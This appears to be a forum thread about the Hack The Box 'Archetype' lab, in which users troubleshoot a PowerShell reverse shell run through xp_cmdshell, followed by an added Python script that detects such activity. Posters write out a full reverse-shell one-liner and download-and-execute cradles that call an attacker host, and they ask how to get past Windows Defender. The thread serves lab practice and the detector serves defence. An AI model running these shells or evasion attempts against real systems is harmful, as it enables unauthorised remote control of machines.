Archetype reverse shell

I get all the way to where I host a server on port 80 and get up a netcat on 443. I get the script and modify it with my IP and the correct port. I run the command:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.124/shell.ps1\“);”

and get a connection. But! There is nothing happening. If I press ENTER on the nc terminal I only get a # and nothing else. Anyone know what to do?

So I’m also having problems with a reverse shell. I tried a slightly different one:

$client = New-Object System.Net.Sockets.TCPClient(“10.10.16.124”,443);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

but this gives the following error:

IEX : At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient(“10.10.15.172”,443) …
+ ~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.172/sh …
+~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
NULL

I wonder if there’s been an update to the OS somewhere?

Save the script like this:

$client = New-Object System.Net.Sockets.TCPClient(“your IP”,443); $stream = $client.GetStream(); [byte[]]$bytes = 0…65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "# "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()

This will make the connection, but no shell received.

Thanks - I still get the following though: “This script contains malicious content and has been blocked by your antivirus software.”

I requested a restart of the box when I got that message and after the restart it went through. Try it!

I’m having the same issue that my payload is picked by the antivirus software. I tried encoding the payload with metasploit but without success. Any idea how to bypass the Windows Defender?

What is weird is that it was working before. Maybe there was an update?

I have been receiving this error when I try to run a powershell with xp_cmdshell.

[-] ERROR(ARCHETYPE): Line 1: Incorrect syntax near ‘/’.

The command I run is:
xp_cmdshell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.55:8044/rev.ps1’)”

I’d appreciate any tips or nudges. Thank you.
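
Seen from the defending side, the activity discussed in this thread (xp_cmdshell starting a shell under SQL Server and PowerShell pulling a script with IEX and DownloadString) is visible in process-creation telemetry. The following is an added example, not part of any post in this thread; the event field names, host name, rule names and sample records are constructed assumptions.

```python
import re

# Rules over process-creation events (assumed fields: host, parent, image, cmdline).
SQL_PARENT = re.compile(r"\\sqlservr\.exe$", re.I)             # xp_cmdshell runs children under sqlservr.exe
SHELL_CHILD = re.compile(r"\\(cmd|powershell|pwsh)\.exe$", re.I)
CRADLE = re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I | re.S)
TCP_CLIENT = re.compile(r"net\.sockets\.tcpclient", re.I)      # inline socket client in a command line

def classify(event):
    """Return the names of all rules a single event matches."""
    hits = []
    if SQL_PARENT.search(event["parent"]) and SHELL_CHILD.search(event["image"]):
        hits.append("sqlservr_spawned_shell")
    if CRADLE.search(event["cmdline"]):
        hits.append("powershell_download_cradle")
    if TCP_CLIENT.search(event["cmdline"]):
        hits.append("inline_tcpclient")
    return hits

def triage(events):
    """Return (host, severity, rules) for every event that matches a rule."""
    findings = []
    for event in events:
        hits = classify(event)
        if not hits:
            continue
        # A shell under SQL Server plus a script-fetching command line is the strong signal.
        chained = "sqlservr_spawned_shell" in hits and len(hits) > 1
        findings.append((event["host"], "high" if chained else "medium", hits))
    return findings

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
# Constructed sample records; 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    {"host": "SQL01", "parent": SQLSERVR, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c powershell "IEX (New-Object Net.WebClient)'
                '.DownloadString(\'http://192.0.2.10/a.ps1\')"'},
    {"host": "SQL01", "parent": SQLSERVR, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "WS07", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Temp"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Any child shell of sqlservr.exe is worth reviewing on its own, since production database servers rarely need xp_cmdshell enabled.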